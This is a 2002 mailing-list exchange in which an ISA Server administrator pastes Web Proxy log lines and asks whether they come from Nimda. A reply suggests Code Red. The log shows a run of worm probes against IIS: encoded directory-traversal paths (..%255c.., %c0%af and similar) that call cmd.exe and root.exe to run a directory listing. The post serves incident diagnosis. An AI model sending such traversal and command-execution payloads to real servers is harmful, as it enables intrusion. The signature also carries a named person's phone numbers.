It looks more like a codered attack. -----Original Message----- From: Rogers, Brian [mailto:RogersB@xxxxxxxxxxxxxx] Sent: Wednesday, January 09, 2002 2:39 PM To: [ISAserver.org Discussion List] Subject: [isalist] Any ideas on this entry in my Web proxy log? http://www.ISAserver.org Im finding a lot of these in my Web Proxy log on my ISA server from various External IP addresses. Would this be nimda/goner/etc related? My ISA server does not even run IIS. 12.14.65.42 anonymous - 2002-01-09 16:40:24 ISASERVER - www - - - 72 - - GET http://www/scripts/root.exe?/c+dir - 12202 12.14.65.42 anonymous - 2002-01-09 16:40:25 ISASERVER - www - - - 70 - - GET http://www/MSADC/root.exe?/c+dir - 12202 12.14.65.42 anonymous - 2002-01-09 16:40:25 ISASERVER - www - - - 80 - - GET http://www/c/winnt/system32/cmd.exe?/c+dir - 12202 12.14.65.42 anonymous - 2002-01-09 16:40:25 ISASERVER - www - - - 80 - - GET http://www/d/winnt/system32/cmd.exe?/c+dir - 12202 12.14.65.42 anonymous - 2002-01-09 16:40:26 ISASERVER - www - - - 96 - - GET http://www/scripts/..%255c../winnt/system32/cmd.exe?/c+dir - 12202 12.14.65.42 anonymous - 2002-01-09 16:40:26 ISASERVER - www - - - 117 - - GET http://www/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe ?/c+dir - 12202 12.14.65.42 anonymous - 2002-01-09 16:40:26 ISASERVER - www - - - 117 - - GET http://www/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe ?/c+dir - 12202 12.14.65.42 anonymous - 2002-01-09 16:40:26 ISASERVER - www - - - 145 - - GET http://www/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1 %1c../winnt/system32/cmd.exe?/c+dir - 12202 12.14.65.42 anonymous - 2002-01-09 16:40:27 ISASERVER - www - - - 97 - - GET http://www/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir - 12202 12.14.65.42 anonymous - 2002-01-09 16:40:27 ISASERVER - www - - - 97 - - GET http://www/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir - 12202 12.14.65.42 anonymous - 2002-01-09 16:40:27 ISASERVER - www - - - 97 - - GET http://www/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir - 12202 12.14.65.42 anonymous - 2002-01-09 16:40:27 ISASERVER - www - - - 97 - - GET http://www/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir - 12202 12.14.65.42 anonymous - 2002-01-09 16:40:28 ISASERVER - www - - - 98 - - GET http://www/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir - 12202 12.14.65.42 anonymous - 2002-01-09 16:40:28 ISASERVER - www - - - 96 - - GET http://www/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir - 12202 12.14.65.42 anonymous - 2002-01-09 16:40:28 ISASERVER - www - - - 100 - - GET http://www/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir - 12202 12.14.65.42 anonymous - 2002-01-09 16:40:28 ISASERVER - www - - - 96 - - GET http://www/scripts/..%252f../winnt/system32/cmd.exe?/c+dir - 12202 Brian W. Rogers MCSE, MCT, MCP Client/Server Network Developer Tree of Life Corporation rogersb@xxxxxxxxxxxxxx office: (904)940-2152 mobile: (904)806-7173 ------------------------------------------------------ You are currently subscribed to this ISAserver.org Discussion List as: scott.anderson@xxxxxxxxxxxxxxx To unsubscribe send a blank email to $subst('Email.Unsub')